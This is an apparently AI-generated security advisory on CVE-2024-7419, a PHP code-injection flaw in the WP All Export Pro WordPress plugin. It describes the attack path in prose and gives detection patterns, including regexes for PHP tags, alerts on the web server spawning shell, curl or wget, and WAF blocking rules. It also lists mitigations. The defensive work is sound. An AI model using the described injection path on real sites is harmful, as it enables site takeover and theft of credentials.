CVE-2024-7419 Overview
CVE-2024-7419 is a Remote Code Execution (RCE) vulnerability in the WP All Export Pro plugin for WordPress, developed by Soflyy. The flaw affects all plugin versions up to and including 1.9.1. The vulnerability stems from missing input validation and sanitization in custom export fields, allowing attackers to inject arbitrary PHP code that executes server-side during the export process. Exploitation requires the custom export field to include fields containing user-supplied data. The issue is tracked under CWE-94: Improper Control of Generation of Code.
Critical Impact
Unauthenticated attackers can inject PHP code into export form fields, achieving full remote code execution and complete site compromise on affected WordPress installations.
Affected Products
- Soflyy WP All Export Pro plugin for WordPress
- All versions up to and including 1.9.1
- WordPress sites where custom export fields include user-supplied data
Discovery Timeline
- 2025-02-07 - CVE-2024-7419 published to the National Vulnerability Database
- 2025-02-11 - Last updated in NVD database
Technical Details for CVE-2024-7419
Vulnerability Analysis
The WP All Export Pro plugin allows administrators to define custom export fields using PHP expressions for advanced data transformation. The plugin evaluates these expressions at export runtime. When a custom export field references user-supplied data, the plugin fails to validate or sanitize that input before incorporating it into the evaluated PHP context. An attacker who can submit data that ends up in an exported record can plant PHP payloads that the server later executes during export.
Because execution occurs in the WordPress PHP process, payloads run with the privileges of the web server user. This enables arbitrary command execution, webshell installation, credential theft from wp-config.php, lateral movement, and persistence. The attack is network-based and requires no authentication, though it does require a user interaction component on the export-triggering side.
Root Cause
The root cause is improper control of code generation [CWE-94]. The plugin treats user-supplied content as trusted when constructing or evaluating PHP code within custom export field handlers. There is no allowlist, escaping, or sandboxing of values that originate from public-facing data sources such as posts, comments, custom post types, or form submissions.
Attack Vector
An unauthenticated attacker submits crafted content to a public input vector that feeds into WordPress data later included in a custom export, such as a post body, comment field, custom field, or third-party form plugin entry. The payload contains PHP syntax designed to break out of the export field expression context. When an administrator or scheduled job runs the export, the plugin evaluates the field, executing the injected PHP. Successful exploitation yields full server-side code execution under the WordPress process account.
No verified public proof-of-concept code is available. See the Wordfence Vulnerability Report for additional technical context.
Detection Methods for CVE-2024-7419
Indicators of Compromise
- Unexpected PHP files written under wp-content/uploads/, wp-content/plugins/, or the WP All Export working directory
- WordPress post, comment, or custom field content containing PHP tags such as <?php, ${}, or backtick command syntax
- Outbound network connections from the php-fpm or web server process to attacker-controlled hosts during scheduled export windows
- Modifications to wp-config.php, .htaccess, or theme functions.php shortly after an export run
Detection Strategies
- Hunt WordPress database tables (wp_posts, wp_postmeta, wp_comments) for embedded PHP code patterns using regex on raw content.
- Monitor file integrity on the WordPress document root and alert on new or modified .php files outside of expected plugin update windows.
- Inspect WP All Export Pro custom export field configurations for expressions that reference unsanitized user-supplied fields.
- Correlate wp-cron or scheduled export execution events with anomalous child process activity from the PHP runtime.
Monitoring Recommendations
- Enable web application firewall logging for requests submitting content containing PHP tag sequences to public WordPress endpoints.
- Alert on the WordPress PHP process spawning shell utilities such as sh, bash, curl, wget, or python.
- Track outbound DNS and HTTP requests from web servers to newly registered or low-reputation domains.
How to Mitigate CVE-2024-7419
Immediate Actions Required
- Update the WP All Export Pro plugin to a version later than 1.9.1 as soon as the vendor publishes a fix.
- Audit all configured custom export fields and remove any PHP expressions that reference user-supplied data fields.
- Scan the WordPress database and filesystem for embedded PHP payloads and webshells planted prior to patching.
- Rotate WordPress administrator credentials, database passwords, and API keys stored in wp-config.php if compromise is suspected.
Patch Information
Soflyy has been notified through the Wordfence disclosure process. Administrators should consult the Wordfence Vulnerability Report and the WP All Import vendor site for the current fixed version and upgrade guidance. Apply updates through the WordPress plugin manager or by replacing the plugin directory with the patched release.
Workarounds
- Temporarily disable WP All Export Pro on sites that cannot patch immediately, particularly those accepting public submissions.
- Restrict export execution to trusted administrators and disable scheduled exports until custom field configurations are reviewed.
- Deploy WAF rules that block requests containing PHP tag sequences (<?php, <?=) in public input fields feeding WordPress content.
- Apply least-privilege filesystem permissions on the WordPress document root to limit the impact of any successful code execution.
# Configuration example: locate suspicious PHP payloads in WordPress content
wp db query "SELECT ID, post_title FROM wp_posts WHERE post_content REGEXP '<\\?(php|=)'"
wp db query "SELECT comment_ID FROM wp_comments WHERE comment_content REGEXP '<\\?(php|=)'"
# Disable the vulnerable plugin until patched
wp plugin deactivate wp-all-export-pro
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
